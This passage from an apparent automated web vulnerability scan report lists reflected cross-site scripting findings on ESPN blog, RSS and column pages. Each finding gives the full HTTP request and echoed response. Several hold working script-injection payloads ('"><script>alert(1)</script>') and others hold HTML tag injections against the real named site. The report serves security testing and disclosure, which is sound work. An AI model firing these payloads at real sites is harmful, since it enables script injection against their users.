Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0d59e1';a8fb555b141%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.226. http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-jersey-devils

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6803a"><a>7c711d6e0b5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33353
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5" />
...[SNIP]...

3.227. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-islanders

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5588e"><a>6fa37241377 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33307
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377" />
...[SNIP]...

3.228. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-rangers

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c495"><a>c35cbec8142 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:42 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Wed, 23 Feb 2011 23:25:42 GMT
InvH: blog-new-yorkhockey
Content-Length: 35047
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142" />
...[SNIP]...

3.229. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11851"><script>alert(1)</script>c254b6c06ee was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:19:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkknicks
Content-Length: 69717
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee/sort/oldest">
...[SNIP]...

3.230. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3622"><script>alert(1)</script>a8a4b6f11a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks?f3622"><script>alert(1)</script>a8a4b6f11a1=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:18:21 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:18:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Wed, 23 Feb 2011 23:23:21 GMT
InvH: blog-new-yorkknicks
Content-Length: 69328
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/f3622"><script>alert(1)</script>a8a4b6f11a1=1/id/2851/sort/oldest/melo-will-wear-no-7-for-the-knicks">
...[SNIP]...

3.231. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2eb1"><script>alert(1)</script>b1d8aa4d5e3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:50 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:25:50 GMT
InvH: blog-new-yorkjets
Content-Length: 55011
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/rex-tannenbaum-ready-for-prime-timeb2eb1"><script>alert(1)</script>b1d8aa4d5e3/id/4686/sort/oldest">
...[SNIP]...

3.232. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f156"><script>alert(1)</script>4a93f5fb5e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time?1f156"><script>alert(1)</script>4a93f5fb5e8=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkjets
Content-Length: 54453
Cache-Control: no-cache
Pragma: no-cache
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Rex, Tannenbaum rea
...[SNIP]...
<a href="/blog/new-yorkjets/post/_/id/4686/1f156"><script>alert(1)</script>4a93f5fb5e8=1/sort/oldest/rex-tannenbaum-ready-for-prime-time">
...[SNIP]...

3.233. http://espn.go.com/espn/rss/newyork/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /espn/rss/newyork/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 993b0<a>c8de8f03e79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /espn/rss/newyork/news?993b0<a>c8de8f03e79=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=15
Date: Wed, 23 Feb 2011 23:20:52 GMT
Content-Type: text/xml; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Wed, 23 Feb 2011 23:36:07 GMT
Content-Length: 14917
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="http://sports.espn.go.com/rss/friendlyRSSDemo.xsl" type="text/xsl" media="screen"?>
<rss version="2.0"    xmlns:dc="http://purl.org/dc/eleme
...[SNIP]...
<atom:link rel="self" href="http://sports.espn.go.com/espn/rss/newyork/news?993b0<a>c8de8f03e79=1" />
...[SNIP]...

3.234. http://espn.go.com/ncb/conversation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /ncb/conversation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99b1"><script>alert(1)</script>c51c4c595ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncb/conversation?gameId=310542599&f99b1"><script>alert(1)</script>c51c4c595ec=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Date: Wed, 23 Feb 2011 23:22:00 GMT
Content-Type: text/html
Last-Modified: Wed, 23 Feb 2011 23:22:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:22:05 GMT
Content-Length: 45097
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="?gameId=310542599&amp;f99b1"><script>alert(1)</script>c51c4c595ec=1&amp;sort=oldest">
...[SNIP]...

3.235. http://espn.go.com/new-york/columns/archive [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /new-york/columns/archive

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db4"><script>alert(1)</script>35d0e784658 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york/columns/archive?name=ian-o-connorf0db4"><script>alert(1)</script>35d0e784658 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Wed, 23 Feb 2011 23:13:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Wed, 23 Feb 2011 23:14:42 GMT
Content-Length: 21570
Connection: close
